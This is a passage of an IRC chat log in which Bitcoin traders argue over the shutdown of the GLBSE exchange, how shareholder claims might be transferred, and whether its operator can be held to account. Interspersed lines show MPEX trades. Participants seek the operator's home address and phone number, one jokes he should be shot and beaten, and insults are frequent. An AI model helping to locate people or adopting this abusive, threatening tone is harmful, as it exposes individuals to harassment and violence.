traded OTC style with a room he on freenode like the #bitcoin-otc Oct 06 11:14:28 <____Atlas_____> BTC-Mining: That takes some labor and time for everyone Oct 06 11:14:29 GLBSE is apparently going to be giving everyone enough information to continue their securities Oct 06 11:14:38 Luceo hopefully. Oct 06 11:14:41 <____Atlas_____> Reduced efficiency Oct 06 11:14:45 <____Atlas_____> means lower price Oct 06 11:14:54 OTC? In community, where 99% are liars and scumbags? Are you fkn serious? Oct 06 11:14:57 the entire thing could end up a morass of double claims Oct 06 11:15:10 <____Atlas_____> femtotube: You can start your own exchange Oct 06 11:15:33 the entire fkn forum is run by a scumbag, who wanted to dump his shares on some poor idiot with coin Oct 06 11:15:40 :D Oct 06 11:15:43 exactly. Oct 06 11:16:27 <____Atlas_____> femtotube: Free market. Oct 06 11:16:30 atlas, how delusional are you? Oct 06 11:16:30 <____Atlas_____> Welcome. Oct 06 11:17:01 <____Atlas_____> Delusion is usually characterized with a false sense of reality; not accepting events as they come. Oct 06 11:17:04 the exchange whereby joe buys a sack in which may be some potatoes in exchange for an enveolpe wherein may be some money has nothing to do with free markets. Oct 06 11:17:06 free market? wtf do you even know about free market? I guess nothing Oct 06 11:17:20 <____Atlas_____> Depends on your definition of free. Oct 06 11:17:36 <____Atlas_____> In this case, theymos is free to do whatever the fuck he wants with his GLBSE stock. Oct 06 11:17:45 <____Atlas_____> That's my kind of free market. Oct 06 11:17:59 altas, jou are a cluless fuck with no real life experience. just stfup Oct 06 11:18:25 <____Atlas_____> Heh. We can discuss how I am wrong if you want. Oct 06 11:18:26 free to scam? sure. Oct 06 11:18:37 <____Atlas_____> The world has always been free to scam. Oct 06 11:18:43 <____Atlas_____> People get scammed everywhere every day Oct 06 11:18:53 <____Atlas_____> In this case, we just have a irreversible currency Oct 06 11:18:54 i rather not spend my time arguing with someone as clueless as you , atlas. Oct 06 11:18:59 <____Atlas_____> So the effects are hard to manage. Oct 06 11:19:13 <____Atlas_____> You simply feel uncomfortable. Oct 06 11:19:20 <____Atlas_____> You feel threatened, unloved. Oct 06 11:19:29 <____Atlas_____> So you lash out. Oct 06 11:19:36 <____Atlas_____> Primitive insecurity. Oct 06 11:19:54 <____Atlas_____> That's not your thinking mind talking. Oct 06 11:19:58 <____Atlas_____> That's your primal fear. Oct 06 11:20:12 or... someone is just angry that his money is... gone Oct 06 11:20:21 lol. atlas how much for a curse ? Oct 06 11:20:43 <____Atlas_____> Hmm? Oct 06 11:21:05 Hope you didn't have too much and too many different kind of assets femtotube then. Oct 06 11:21:28 <____Atlas_____> I had 200 BTC in assets on GLBSE, fyi. Oct 06 11:21:31 <____Atlas_____> I am not even mad. Oct 06 11:21:38 Atlas you have never done anything in your life except blabbering in forums and irc. You have never invested, you have never lost or win. You are like a piece of shit on a street. Oct 06 11:21:57 But you know, asset issuer can probably act as escrows for shares transfer. Oct 06 11:21:58 why on a street ? Oct 06 11:22:18 <____Atlas_____> I rather be the kind of free floater on a public urinal that got there mysteriously... Oct 06 11:22:28 <____Atlas_____> ...with a hint of ethanol like taint from Taco Bell. Oct 06 11:22:53 <____Atlas_____> Then when the janitor comes to clean me up: He goes fuck no. Oct 06 11:23:02 <____Atlas_____> He tries to have Jose do it. Jose is like no fuck you. Oct 06 11:23:05 [MPEX] [S.MPOE] 48100 @ 0.00037151 = 17.8696 BTC [+] Oct 06 11:23:06 [MPEX] [S.MPOE] 15457 @ 0.0003711 = 5.7361 BTC [-] Oct 06 11:23:07 <____Atlas_____> I never get cleaned up. Oct 06 11:23:11 <____Atlas_____> And I rot there Oct 06 11:23:22 <____Atlas_____> Until some trucker comes to clean me off with his 10 gallon piss Oct 06 11:23:28 ignore works Oct 06 11:26:16 anyone has nefario's tel number and the address? Oct 06 11:26:25 <____Atlas_____> I offered that until you got pissy Oct 06 11:28:25 femtotube i posted it earlier. Oct 06 11:31:14 <____Atlas_____> https://bitcointalk.org/index.php?topic=5373.msg1249674#msg1249674 Oct 06 11:31:25 <____Atlas_____> Here lies the answer to the Resourced-Based Economy Oct 06 11:31:37 <____Atlas_____> With this sufficiently answered, will change economics as we know it. Oct 06 11:31:42 <____Atlas_____> it* Oct 06 11:31:50 <____Atlas_____> (not at all) Oct 06 11:33:53 and what is this ass-hat nefarios real name? Oct 06 11:34:11 http://who.is/whois/glbse.com Oct 06 11:34:28 James McCarthy Oct 06 11:34:37 femtotube https://bitcointalk.org/index.php?topic=46486.msg557843#msg557843 Oct 06 11:35:20 that address is wrong james lives in manchester Oct 06 11:35:24 [MPEX] [O.BTCUSD.P150T] 385 @ 0.33107717 = 127.4647 BTC [-] Oct 06 11:35:39 <____Atlas_____> So Nefario isn't James McCarthy? Oct 06 11:36:09 james i nefario Oct 06 11:36:13 *is Oct 06 11:36:55 Yes, although is location changed a few times. Oct 06 11:37:01 He was publicly known. Oct 06 11:38:03 what went wrong with my /ignore ? I still see this idiots posts. Oct 06 11:38:05 though james is irish so maybe a relative Oct 06 11:38:14 What's such a big fuss anyway, stock exchanges delist assets on occasions, it doesn't mean everything is lost, just that the asset is no longer traded on an exchange. Oct 06 11:38:31 /ignore name ALL Oct 06 11:38:51 BTC-Mining glbse was not an exchange in this sense. Oct 06 11:39:21 Eh, it was more of a broker to me. Oct 06 11:39:48 point being, to qualify as an exchange in that sense, there'd have to be a way for ownership to be established and verified. Oct 06 11:40:17 atm the entire codes mess is due to the fact glbse purported to be an exchange, sold itself as an exchange, but it was merely a dumbass website, not an exchange. Oct 06 11:40:48 What is the usual method to establish ownership? Oct 06 11:40:59 irl there's the entire clearance-holding system Oct 06 11:41:15 online the gpg system might be sufficient (hasn't really been tested yet) Oct 06 11:41:30 It seems a method will be implemented, albeit after the worse has happened. Oct 06 11:41:39 maybe. Oct 06 11:41:43 and pretty makeshift solution... Oct 06 11:41:58 i still dunno how they can go from (users in db) state to (independent yet verified ownership) state Oct 06 11:42:09 login, give BTC address/email, send that to asset issuers. Oct 06 11:42:25 that;d have to bring glbse.com back i guess Oct 06 11:42:47 see, you can't split it. Oct 06 11:42:52 or some other system without the ability to trade Oct 06 11:42:58 if user X has 3 assets, you can't give his name/pw to 3 issuers Oct 06 11:43:06 and have 3 accts with the same pw Oct 06 11:43:09 I think that's the plane, to bring an online tool for GLBSE to log on for asset holders to give their email/btc address. Oct 06 11:43:21 BTC-Mining suppose i steal someone's email. Oct 06 11:43:28 email is not a secure means of conveyance Oct 06 11:43:40 not for communication, much less for ownership. Oct 06 11:43:53 No, the holder would log in on GLBSE.com. The holder would give an email/btc address. Oct 06 11:43:58 right,. Oct 06 11:43:59 and then ? Oct 06 11:44:04 <____Atlas_____> mircea_popescu: These people are not on your level of conciousness. Oct 06 11:44:13 Then GLBSE would email the email and BTC address to the asset issuers. Oct 06 11:44:15 <____Atlas_____> Email is good enough for them Oct 06 11:44:17 and i stole the email Oct 06 11:44:21 and they email me. what now ? Oct 06 11:44:50 <____Atlas_____> The securities are your Oct 06 11:44:52 <____Atlas_____> yours* Oct 06 11:44:58 <____Atlas_____> Woohoo Oct 06 11:45:01 who emails who? Oct 06 11:45:04 what if i didn't steal it but the users claims so ? Oct 06 11:45:16 BTC-Mining i imagine the issuer to the shareholder, in your system. right ? Oct 06 11:45:24 yes Oct 06 11:45:31 well... Oct 06 11:45:44 email traffic is neither encrypted nor is it so reliable. Oct 06 11:46:13 you're basically sending this stuff plaintext over the wires. Oct 06 11:46:21 So? We're no longer talking about claim codes. Oct 06 11:46:30 ok, let's audit the entire story. Oct 06 11:46:45 so, i glbse put the website back up. all customers login, and have a set of tickboxes Oct 06 11:46:45 We're talking about issuer receiving a BTC address of the shareholders. Oct 06 11:46:56 yup Oct 06 11:46:56 of which issuers they want their email and btc addy communicated. fair enough ? Oct 06 11:47:05 yes Oct 06 11:47:15 now, this is complete. after say what ? 1 month ? Oct 06 11:47:23 what if i come after 35 days and say i was on vacartion ? Oct 06 11:47:37 what if i was in prolonged narcolepsia ? Oct 06 11:47:52 or in a coma. loot the coma victim ? Oct 06 11:48:01 That would be an issue. Oct 06 11:48:04 but we leave this aside. Oct 06 11:48:17 so this completed somehow, in like a week or whatever, and everyone ticked boxes. Oct 06 11:48:27 now, glbse distributes these lists to the asset issuers. right ? Oct 06 11:48:32 Aye Oct 06 11:48:35 what now ? Oct 06 11:48:51 Issuers can pay to said BTC address, at least. Oct 06 11:49:01 why are issuers getting the btc of customers ? Oct 06 11:49:11 i thoguht that was already sent out, we're only doing the paper. Oct 06 11:49:43 if i have 100 btc and 3 tickers in my portofolio you plan to what, give each ticker 33 btc ? Oct 06 11:50:08 No, funds that are not spent are to be returned to the account owner. Oct 06 11:50:21 ok. so now, the issuers have list of email addy and btc addy. Oct 06 11:50:30 Only the BTC address with number of shares tied to it will be sent to issuers. Oct 06 11:50:32 if they need to pay dividends they can *claim* they paid. Oct 06 11:50:32 Yes Oct 06 11:50:35 don't aim too high. this is the internet & bitcoin & anonymous users after all. you won't find a smooth way to handle this like IRL. imho Oct 06 11:50:42 except, after the 1st dividend run all customer addys are now public. Oct 06 11:51:03 <____Atlas_____> mircea_popescu: What do you suggest is done? Oct 06 11:51:05 so now suppose customer X complains he didn't get dividend. Oct 06 11:51:11 issuer claims he paid ALL dividends. Oct 06 11:51:17 what do we do BTC-Mining ? who is lieing ? Oct 06 11:51:45 ____Atlas_____ i suggest nefario is shot, and any further cocky nitwits purporting to create this sort of messes are stripped and beaten, first. Oct 06 11:51:47 The same could be said about GLBSE if someone claimed to have an incorrect balance on his account. Oct 06 11:51:51 Directly. Oct 06 11:51:59 <____Atlas_____> mircea_popescu: *claps* Oct 06 11:52:03 BTC-Mining no, cause it wouldn't be a game of chase among 3. Oct 06 11:52:07 it'd be one or the other. Oct 06 11:53:00 so. did glbse not give correct list, did issuer not pay all people or did guy lie about being entitled to dividend ? Oct 06 11:53:16 The underlying issue remains the same it seems... Oct 06 11:53:21 when more than two people are responsible nobody can be made responsible. Oct 06 11:53:23 with a chase among 3 Oct 06 11:53:34 With GLBSe possibly giving the wrong list. Oct 06 11:53:58 instead of GLBSE stealing shares, Nefario gives his own address for some or all shares, for example. Oct 06 11:54:16 BTC-Mining that is an entirely diff class of valid objection Oct 06 11:54:23 Or that would be claimed by issuer after people complain they haven't received anything. Oct 06 11:54:25 what if nefario just fills in with his addy for all those who don't respond ? Oct 06 11:54:34 he then will be making more by closing down glbse than he ever made running it. Oct 06 11:54:38 and who's to know ? Oct 06 11:55:05 Yes. Especially if afterward he close the method to submit BTC addys Oct 06 11:55:36 Since other investors are missing then, they have no recourse, and since not all holders are publicly known, there's no way to know that. Oct 06 11:55:40 well. so, there's a saying, "one fool thows a rock in the sea and ten wise men struggle to fish it out" Oct 06 11:55:52 your discussion is interesting, but who'd be actually in charge to do anything like that? Oct 06 11:55:57 he's thrown it in, fuckall knows how to get it back out. Oct 06 11:56:11 drekk well that's ALSO unclear. nefario or theymos or "the community" Oct 06 11:56:14 or nobody. Oct 06 11:56:20 so, what the plan to fix this mess and move on? Oct 06 11:56:25 right. Oct 06 11:56:28 well if its nefario, everything dies at that point Oct 06 11:56:30 femtotube google bitcoinica. Oct 06 11:56:40 the EXACT same blueprint. zhou and tihan = nefario and theymos Oct 06 11:56:53 dont know what to make of theymos atm Oct 06 11:56:58 no, i will not because bitcoinica has nothing to do with fixing something Oct 06 11:57:02 the mess will (in my opinion) never be resolved. ever. Oct 06 11:57:20 ack Oct 06 11:57:26 it another scam that was run by "respected" LOL! members of this "community" Oct 06 11:57:37 Sweet, I'm fooked then... Oct 06 11:57:38 femtotube the same members. nefario is an interscamgro alumni. Oct 06 11:57:48 BTC-Mining mind you, this is just my opinion. Oct 06 11:57:50 from now on, i'll work hard to never be respected by the community Oct 06 11:57:52 mircea_popescu: i understand how this makes you feel good and you can gloat now like never before Oct 06 11:57:58 I would have other people's funds but no way to return them. Oct 06 11:57:59 femtotube im not even gloating. Oct 06 11:58:04 sure you are Oct 06 11:58:08 why ? Oct 06 11:58:37 because you are just another sociopath in this ugly BTC community Oct 06 11:58:46 im not even a sociopath. Oct 06 11:58:46 mircea, notice the usage of the word "would", pointing to the fact it's hypothetical Oct 06 11:58:49 (nor am i greek) Oct 06 11:59:03 mircea_popescu: no, you are romanian Oct 06 11:59:05 BTC-Mining the why was at tubeguy Oct 06 11:59:46 I'm not talking about the why, but because you said "[04:57] BTC-Mining mind you, this is just my opinion." Oct 06 11:59:53 o o hehe Oct 06 12:00:08 Which I was pointing out understand that by using "would" Oct 06 12:00:17 yeah. Oct 06 12:00:45 it's a stinky situation to be in especially because you may THINK you're ok, everyone claimed, everyone was taken care of, all is good Oct 06 12:00:48 you're back to paying dividends Oct 06 12:00:56 then three weeks later there's this claim. Oct 06 12:01:13 [MPEX] [S.MPOE] 20018 @ 0.0003711 = 7.4287 BTC [-] Oct 06 12:01:15 [MPEX] [S.MPOE] 18682 @ 0.00037054 = 6.9224 BTC [-] Oct 06 12:01:22 so there'd have to be a statute of limitations baked in at any rate, otherwise nobody sane would accept to be part of this as an issuer Oct 06 12:01:29 Which might be legitimate or a complete fraud. Oct 06 12:01:34 and obviously in a decentralized currency nobody has the authority to make such a statute Oct 06 12:01:40 cause hey, government bad mmkay. Oct 06 12:01:57 Well to each system, it's advantages I guess... Oct 06 12:02:03 i think it's a perfect lesson in practical politics, economics and law for all involved. Oct 06 12:02:23 so in this sense there's a benefit. Oct 06 12:02:46 But are the average bitcointalk folks even able to get a lesson out of this... Oct 06 12:03:02 well, nobody cares about average folk. experience benefits those involved. Oct 06 12:03:27 I was pretty much saying for involved folks... Oct 06 12:03:39 a. i would hope so, really. Oct 06 12:03:40 Seeing as how most seem to act around the forums. Oct 06 12:05:05 may I ask about the topic of your conversation? whats "this" in "average bitcointalk folks even able to get a lesson out of this" Oct 06 12:05:26 we were auditing the proposed process to get out of the glbse singularity. Oct 06 12:06:40 So just that GLBSE is down or have there been updates about that "singularity" .... Oct 06 12:06:57 yea, a lot of announcement. Oct 06 12:07:00 +S Oct 06 12:07:23 https://bitcointalk.org/index.php?topic=115669.140 Oct 06 12:08:59 GLBSE is not just down, it's closing definitly Oct 06 12:11:04 <____Atlas_____> Well, since this is now a criminal enterprise Oct 06 12:11:10 <____Atlas_____> and a high-risk venture Oct 06 12:11:16 <____Atlas_____> this is a nice market opening we got here Oct 06 12:11:21 <____Atlas_____> Hmmm Oct 06 12:12:07 wondering if/how this will affect btc/fiat exchange rates Oct 06 12:12:10 ok... so no im really screwed ... Oct 06 12:13:12 touched pirate... it broke... touched BDT... it broke... touched MBT... it broke... and now GLBSE is done.... Oct 06 12:13:37 <____Atlas_____> EVERYTHING I TOUCH DIES Oct 06 12:14:17 drekk realistically it wouldn't. Oct 06 12:14:38 :D Oct 06 12:14:41 <____Atlas_____> mircea_popescu: If a good portion does Oct 06 12:14:59 <____Atlas_____> I mean, if a good portion believes it will go down because of this Oct 06 12:15:01 <____Atlas_____> it does Oct 06 12:15:12 mircea_popescu, i've come to the conclusion that everything's possible in bitcoin world :P Oct 06 12:15:20 ya but glbse volume was something like... 3 months of glbse = 1 day of mtgox Oct 06 12:15:22 <____Atlas_____> This is what makes a market irrational at times because of a perceived irrationality. Oct 06 12:15:38 <____Atlas_____> Goddamn it, my hearing is going out again Oct 06 12:15:40 <____Atlas_____> I am dying. Oct 06 12:15:43 Wondering when mtgox goes offline... thats the only online market thing where I got more bitcoins right now... Oct 06 12:15:45 pirate's crap made a +-30% dent, but that was 500k-ish Oct 06 12:15:55 If I would be you Id pull all my BTC out of mtgox Oct 06 12:15:56 you're right Oct 06 12:16:30 <____Atlas_____> Eisenhower34: There's a reason I stopped daytrading today Oct 06 12:16:38 <____Atlas_____> Things are about to hit the shitter in regards to regulation Oct 06 12:17:02 i really don't think so. Oct 06 12:17:09 <____Atlas_____> I hope you are right. Oct 06 12:17:25 for one, contrary to what most everyone (on the forum) seems to think, sec regulation is very unlike the jackbooted thugedness everyone seems to expect. Oct 06 12:17:36 these aren't white street cops in a black neighbourhood. Oct 06 12:18:27 realistically they'd either put up a guideline or talk to people involved ("advise as to X Y Z") Oct 06 12:18:30 <____Atlas_____> They are beauracrats? Oct 06 12:18:42 rather than i dunno, arrest whoeverthehell. Oct 06 12:18:48 <____Atlas_____> OneEyed: They pretty have Oct 06 12:18:52 <____Atlas_____> but he won't recognize it Oct 06 12:18:54 ____Atlas_____: voted? Oct 06 12:19:00 OneEyed practically, there's no actual way to transfer authority in a btc corp Oct 06 12:19:04 <____Atlas_____> They proposed a vote but Nefario was like hell na Oct 06 12:19:07 <____Atlas_____> fuck you guys Oct 06 12:19:09 ____Atlas_____: theymos said that he said he wouldn't move even if he was voted out Oct 06 12:19:09 this is why mpex doesn't even recognize the concept of shareholder vote. Oct 06 12:19:11 <____Atlas_____> I will be CEO no matter what Oct 06 12:19:13 exact reason. Oct 06 12:19:20 ____Atlas_____: so as far as I know, they haven't voted him out yet Oct 06 12:19:22 I'd say like mircea. For some reason Nefario might just want to quit altogether and isn't forced to close GLBSE. He might just be running from his responsibility as the manager of GLBSE.com Oct 06 12:19:29 <____Atlas_____> OneEyed: They would have if they could. Oct 06 12:19:33 <____Atlas_____> but he has all the assets Oct 06 12:19:38 <____Atlas_____> he has permanent power Oct 06 12:19:41 <____Atlas_____> no matter what Oct 06 12:19:44 ____Atlas_____: so they haven't put a motion forward because of that? Oct 06 12:19:47 <____Atlas_____> Yep Oct 06 12:19:51 ____Atlas_____ which explains to you why this is never getting resolved. Oct 06 12:20:16 ____Atlas_____: do you see what's wrong here? He they put a motion and he refuses to release control of the assets, *then* he is acting openly in violation of the shareholders agreement Oct 06 12:20:26 OneEyed nah, he already has. Oct 06 12:20:31 they meeting was... warm, so to speak. Oct 06 12:20:33 <____Atlas_____> OneEyed: The question is the agreement can be enforced? Oct 06 12:20:37 <____Atlas_____> if the* Oct 06 12:20:37 mircea_popescu: sure, but they have done nothing about it, not even a motion Oct 06 12:20:50 <____Atlas_____> There is no collateral on Nefario Oct 06 12:20:56 OneEyed they're not particularly experienced in these things. Oct 06 12:20:59 <____Atlas_____> They guy is a sovereign when it comes to GLBSE Oct 06 12:21:03 <____Atlas_____> The* Oct 06 12:26:08 We tried voting him out Oct 06 12:26:14 noagendamarket: how? Oct 06 12:26:20 som e people refused to vote Oct 06 12:26:23 noagendamarket: did you put up a motion signed by a majority of shareholders? Oct 06 12:26:33 on irc yes Oct 06 12:26:43 I voted to remove him Oct 06 12:26:45 noagendamarket: ok, so no motion was voted, so he has *not* refused to go out when facing a motion Oct 06 12:26:47 "signed". but anyway. Oct 06 12:26:53 (was passed I mean) Oct 06 12:27:40 didnt matter anyway he has the database etc Oct 06 12:27:44 <____Atlas_____> There is a line between procedure and reality Oct 06 12:27:47 So we can conclude that we do not have a majority of shareholders formally objecting to Nefario being in charge. Oct 06 12:28:05 <____Atlas_____> an objection is irrelevant Oct 06 12:28:10 <____Atlas_____> Nothing can be done Oct 06 12:28:24 noagendamarket: of course he does matter. If he refused to hand over the database while having been removed from the board, that would probably make him liable of other illicit acts. Oct 06 12:28:39 ____Atlas_____: ok, so bend over and take him deep, don't object, do nothing Oct 06 12:28:55 <____Atlas_____> OneEyed: The guy probably has a plane ticket off to China right now Oct 06 12:29:02 So, whos setting up a tor or p2p exchange? Oct 06 12:29:06 <____Atlas_____> A lawsuit against him doesn't benefit me any Oct 06 12:29:44 And..... We are fucked Oct 06 12:30:38 OneEyed you have a solid point, but they're kids and don;t know how thigns work. Oct 06 12:30:41 Now glbse is closed, I will quit pumping btc in stocks etc I am quiting Oct 06 12:30:51 fucking poses Oct 06 12:30:54 posers Oct 06 12:31:02 PsychoticBoy at least it's one click mate. Oct 06 12:31:11 hahahahqahqa[ Oct 06 12:31:20 <____Atlas_____> mircea_popescu: You can't possibly think the legal process works most of the time Oct 06 12:31:21 I cant laugh really Oct 06 12:31:23 [MPEX] [S.MPOE] 35567 @ 0.0003734 = 13.2807 BTC [+] Oct 06 12:31:38 ____Atlas_____ do you have any experience with it ? Oct 06 12:32:13 Nefario fucked us, If I knew this, Then I had punched him at the conference and HARD Oct 06 12:32:14 PsychoticBoy: I'm really sorry for you FDBF managers, your job was examplary Oct 06 12:32:36 bit con ference Oct 06 12:32:40 lol Oct 06 12:32:41 <____Atlas_____> mircea_popescu: I have been in court rooms, yes. Oct 06 12:32:45 yuuuuuup Oct 06 12:32:50 <____Atlas_____> I have seen the results of court proceedings Oct 06 12:32:51 ____Atlas_____ want me to tell you a story then ? Oct 06 12:33:05 it wqas sponsored by intersango what do you expect Oct 06 12:33:16 <____Atlas_____> mircea_popescu: A court ruling isn't going to bring your dead child back. Oct 06 12:33:26 eh this is civil dood. Oct 06 12:33:30 stop mixing things. Oct 06 12:33:45 If I only could go back in time and just kicked nef in the nuts at the conference Oct 06 12:33:48 <____Atlas_____> Meh, I just don't see what we could get out of Nefario if we charge him. Oct 06 12:33:57 ____Atlas_____ clarity. Oct 06 12:34:26 neva trust intersango Oct 06 12:34:39 And wait for BFL to go away with people money, looks like they are getting more and more suspect (found on Reddit): https://dl.dropbox.com/u/7112341/bitcoin/bfl_doesnt_own_a_camera.png Oct 06 12:34:41 <____Atlas_____> I guess I haven't lost enough in this case. I got most of my money out in time. Oct 06 12:34:50 single handedly ripped the guts out of the entire economy Oct 06 12:34:53 <____Atlas_____> I just lost assets I now write off as worthless. Oct 06 12:35:23 ____Atlas_____: Is there a better option than court at this point? I'm no fan of the state but it seems like these issues are constant at this point with no way to collect debt or deal with scammers. Oct 06 12:35:58 <____Atlas_____> Luceo: Nope. We could have gangs do our bidding but that will just bring Bitcoin to illicit level. Oct 06 12:36:03 people are the problem :P Oct 06 12:36:12 <____Atlas_____> No people, no problems. Oct 06 12:36:16 <____Atlas_____> More people, more problems. Oct 06 12:36:22 satoshi needs to build better people Oct 06 12:36:26 ____Atlas_____: Those gangs are viable in a single locale, they're far less viable in a global market Oct 06 12:36:35 fucked up people, fucked up problems Oct 06 12:36:44 Psychotic, technically, FDBF might still be managed without GLBSE. Only it would be excessively hard and time consuming to do so. Oct 06 12:36:46 Oh man I hate this Oct 06 12:36:53 true Oct 06 12:37:08 Use cryptostocks or mpex :P Oct 06 12:37:26 We are going to an other exchange Oct 06 12:37:51 This is the point though where we should be thinking about how to get the exchanges off the clearnet Oct 06 12:37:53 <____Atlas_____> I am going to be brutally honest. Oct 06 12:38:04 It may well have been legal issues that forced nefario's hand Oct 06 12:38:08 <____Atlas_____> I like that this happened because people are now going to take stocks seriously. Oct 06 12:38:34 I doubt it's legal issues, albeit possible. Oct 06 12:38:39 ____Atlas_____: People need to take stock EXCHANGES seriously Oct 06 12:38:49 BTC-Mining: theymos thinks it's legal Oct 06 12:38:54 And he's a major partner Oct 06 12:39:46 <____Atlas_____> Ugh, they should of just hosted it in Russia where they do not give a flying fuck Oct 06 12:39:54 <____Atlas_____> Get a .ru domain name Oct 06 12:40:01 <____Atlas_____> Call it a bloody day Oct 06 12:40:10 Aye... but theymos stated Nefario used users deposit to pay a lawyer, then admitted he was actually just making a guess as he didn't think Nefario had the money for a lawyer and wanted one. Oct 06 12:40:22 So I don't trust theymos' say too much. Oct 06 12:41:16 mtgox withdraw done .... Oct 06 12:41:29 this whole BTC thing sucks more and more Oct 06 12:41:35 losing money on all ends Oct 06 12:41:49 <____Atlas_____> Don't tell me you sold? Oct 06 12:42:04 sold btc? you are damn right Oct 06 12:42:18 <____Atlas_____> FFFFFFFFFF Oct 06 12:42:23 <____Atlas_____> You nonbeliever Oct 06 12:42:53 believe? in btc? btc was a good idea but it attracts too many ... "fraud" Oct 06 12:44:20 If Id get my BTC from pirate / glbse / BDT / mybitcointrade ... id still have 2k BTC ... Oct 06 12:44:38 ouch Oct 06 12:44:49 exactly Oct 06 12:44:57 like i said, everything i touch breaks Oct 06 12:45:12 started GLBSE trading like 1 month ago Oct 06 12:45:23 started with pirate 2 months before he defaulted Oct 06 12:45:36 started with MBT 3 weeks before they gone offline Oct 06 12:45:51 <____Atlas_____> Pirate and the GLBSE are pretty connected Oct 06 12:45:57 <____Atlas_____> It may be the same regulatory swipe Oct 06 12:46:40 I urge everyone to never work with Nefario again. A Bitcoin stock exchange is a good idea, though. I hope that someone will create something better than GLBSE and MPEx. ;; quote theymos Oct 06 12:46:58 <____Atlas_____> I never planned on going to shitstain Ireland anyways Oct 06 12:47:05 <____Atlas_____> They can't even do a proper revolution Oct 06 12:47:11 BTC is excellent for transacting freely over the web. Oct 06 12:47:15 lol Oct 06 12:47:37 For other purposes... it carries a lot more risk. Very attractive to con artists. Oct 06 12:47:50 you can better sale shit on SR or BMR that way youll only earn, not lose btc Oct 06 12:48:15 <____Atlas_____> BMR is scams paradise Oct 06 12:48:27 "BTC is excellent for transacting freely over the web." <- only for "maybe non legal business" and only if the other party accepts BTC Oct 06 12:49:05 BTC is excellent for pissing off politicians. Oct 06 12:49:13 not for sellers Atlas, sellers only profit< Oct 06 12:49:34 <____Atlas_____> Oh true Oct 06 12:49:50 <____Atlas_____> ;;ticker Oct 06 12:49:51 Best bid: 12.69, Best ask: 12.79978, Bid-ask spread: 0.10978, Last trade: 12.69, 24 hour volume: 21154, 24 hour low: 12.51, 24 hour high: 12.89999 Oct 06 12:49:55 <____Atlas_____> Silk Road is doing well Oct 06 12:50:06 <____Atlas_____> It will probably do well until its server gets knocked down Oct 06 12:50:23 then you get another server ... Oct 06 12:50:45 <____Atlas_____> Yep. Oct 06 12:51:33 PsychoticBoy have you rated nefario yet ? Oct 06 12:51:35 Eh, well I'm off for now... Oct 06 12:51:47 no I have not rated nefario Oct 06 12:52:49 <____Atlas_____> "Fact. The owner of MPEX has attempted to sell NSFW photos of herself." Oct 06 12:52:52 <____Atlas_____> LOL Oct 06 12:52:58 <____Atlas_____> I can't stop laughing Oct 06 12:53:34 <____Atlas_____> "Debate MPEX is managed by an untrustworthy romanian pornstar" Oct 06 12:53:41 <____Atlas_____> I am going to die Oct 06 12:54:14 ____Atlas_____ ya, apparently im a girl nao Oct 06 12:54:44 http://scholar.google.com/scholar_case?case=8981495112065260106&hl=en&lr=lang_en&as_sdt=2,5&as_vis=1&oi=scholaralrt&ct=alrt&cd=0#[1] if anyone is curious, i found this a pleasant read Oct 06 12:54:50 the ADC case. Oct 06 12:55:07 ASD* even. the ads rotator ppl Oct 06 12:56:48 mornin. Oct 06 12:57:16 meh if he shuts down glbse before an audit happ[ens no harm no foul lol Oct 06 12:58:09 if anyone asks "I dont know nothing" is a good response :P Oct 06 12:58:37 lol Oct 06 12:59:47 https://bitcointalk.org/index.php?topic=115441.msg1249653#msg1249653 Oct 06 12:59:51 how does that even make sense Oct 06 13:00:17 that's unclear. Oct 06 13:00:40 people are so dumb :( Oct 06 13:00:50 ya think ? Oct 06 13:01:10 "But skizzle and chop, I gotta bunny hop to the stop for three fiddy and I catch you downside. yo" Oct 06 13:01:15 i dunno, reeses is pretty good. Oct 06 13:01:31 :) Oct 06 13:02:05 jurov, what is the usercount on coinbr Oct 06 13:02:33 6 atm Oct 06 13:03:05 [MPEX] [S.MPOE] 1111 @ 0.00037054 = 0.4117 BTC [-] Oct 06 13:03:07 [MPEX] [S.MPOE] 17500 @ 0.00036996 = 6.4743 BTC [-] Oct 06 13:03:08 [MPEX] [S.MPOE] 1900 @ 0.00036965 = 0.7023 BTC [-] Oct 06 13:03:09 [MPEX] [S.MPOE] 8889 @ 0.00036936 = 3.2832 BTC [-] Oct 06 13:03:32 jurov put a reg fee! Oct 06 13:03:57 yeah Oct 06 13:03:58 like Oct 06 13:04:01 30 btc or smth! Oct 06 13:04:07 lul Oct 06 13:04:14 well... 20 Oct 06 13:04:25 make the fee payable only in solidcoin Oct 06 13:04:29 _:DDD Oct 06 13:04:32 and only from freshly minted blocks Oct 06 13:04:33 lol Oct 06 13:04:33 haha Oct 06 13:04:46 solidcoin is the demo account Oct 06 13:05:38 I refuse to limit myself to documents such as SECURITIES EXCHANGE ACT OF 1934. Oct 06 13:05:38 Haven't read but I think it's safe to say ~30% of what's written in there is ridiculous and make no sense Oct 06 13:05:41 see, this is the problem Oct 06 13:05:50 i have read it, and i think it's a monument of sensibility. Oct 06 13:06:02 why do people keep doing this ? and by people i mean retarded teenagers. Oct 06 13:07:38 <____Atlas_____> economic depression Oct 06 13:11:12 at least nefario updated the website on saturday ...people just didnt like it lol Oct 06 13:11:47 I wish I was a teenager and knew what I know now Oct 06 13:12:04 PsychoticBoy get all the birds ? Oct 06 13:13:08 I have one and I dont think she agrees with another ¨bird¨ Oct 06 13:13:51 aww Oct 06 13:18:07 <____Atlas_____> ;;ticker Oct 06 13:18:07 Best bid: 12.69, Best ask: 12.79985, Bid-ask spread: 0.10985, Last trade: 12.69, 24 hour volume: 21166, 24 hour low: 12.51, 24 hour high: 12.89999 Oct 06 13:20:07 i get all the birds Oct 06 13:20:11 chickens, turkeys, geese Oct 06 13:20:47 [06:11] I wish I was a teenager and knew what I know now Oct 06 13:21:11 I do wish I was a teenagr again Oct 06 13:21:13 You mean you wish you were purchasing 1000s of bitcoins at 1 USD/1000 BTC Oct 06 13:21:24 I mine since 2010 Oct 06 13:21:42 I have enough coins left but lost a lot at glbse Oct 06 13:21:53 Hmm, what was the price on BTC back then? Oct 06 13:22:04 bought them for the first time when they were 0.04$ a coin Oct 06 13:22:16 Not bad at all. Oct 06 13:22:50 back then I was just mining on cpu and gpu Oct 06 13:23:03 I did found a block with cpu mining back then Oct 06 13:23:16 I wish I heard of BTC before it started to get in the news. Oct 06 13:23:21 solo mining Oct 06 13:23:44 Well, everything is not lost yet. Oct 06 13:24:06 So long as we can get asset management out of GLBSE Oct 06 13:24:58 Hope so, investors in FDBF and ABM are complaining already but hee its not MY fault GLBSE is closed Oct 06 13:25:38 BTC-Mining ironically, my forum readers were trying to get 